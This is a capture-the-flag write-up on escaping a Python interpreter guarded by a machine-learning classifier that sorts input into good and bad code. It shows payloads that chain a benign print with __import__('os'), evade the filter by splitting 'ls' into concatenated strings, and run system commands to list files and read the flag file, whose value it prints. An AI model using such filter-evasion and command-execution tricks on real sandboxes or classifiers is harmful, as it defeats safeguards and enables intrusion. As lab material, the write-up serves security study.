## Solution

This program is essentially just a python code interpreter. But based on the description, there's a filter that classifies the intention of the code to `good_code` and `bad_code`. The model is trained using `bad_code.txt` and `good_code.txt`, and its contents are very straight forward.

#### Attempt 1

So let's just try some code

```
>>> __import__('os')
Bad Code Detected...
```

Well that makes sense, since the`bad_code.txt` contains code very similar to that.

#### Attempt 2

Okay what if we use a line of code from `good_code.txt` and chain it with an attacking code

```
>>> print('Hello, world!'); __import__('os')
Hello, world!
```

Okay so that works! let's try calling `system('ls')` from `os` so that we could see files that are in the current directory.

```
>>> print('Hello, world!'); __import__('os').system('ls')
Bad Code Detected...
```

Well that is detected.

#### Attempt 3

What if we try obfuscating `ls` to `l + s` since they will get tokenized differently but essentially stay the same once evaluated.
```
>>> print('Hello, world!'); __import__('os').system('l' + 's')
Dockerfile
MLjail
ReadME.md
docker-compose.yml
entrypoint.sh
Hello, world!
```

There we go, it seems like it has the same file structure as the zip file provided to us. That means the flag should just be in `MLjail/flag.txt`. Now let's try using the same method above but calling `cat` instead.

```
>>> print('Hello, world!'); __import__('os').system('cat MLjail/flag.txt')
PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}Hello, world!
```

I was surprised that it worked immediately, I guess that makes sense since `cat` was not defined in the `bad_code.txt`. But there it is, the flag is:

```
PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}
```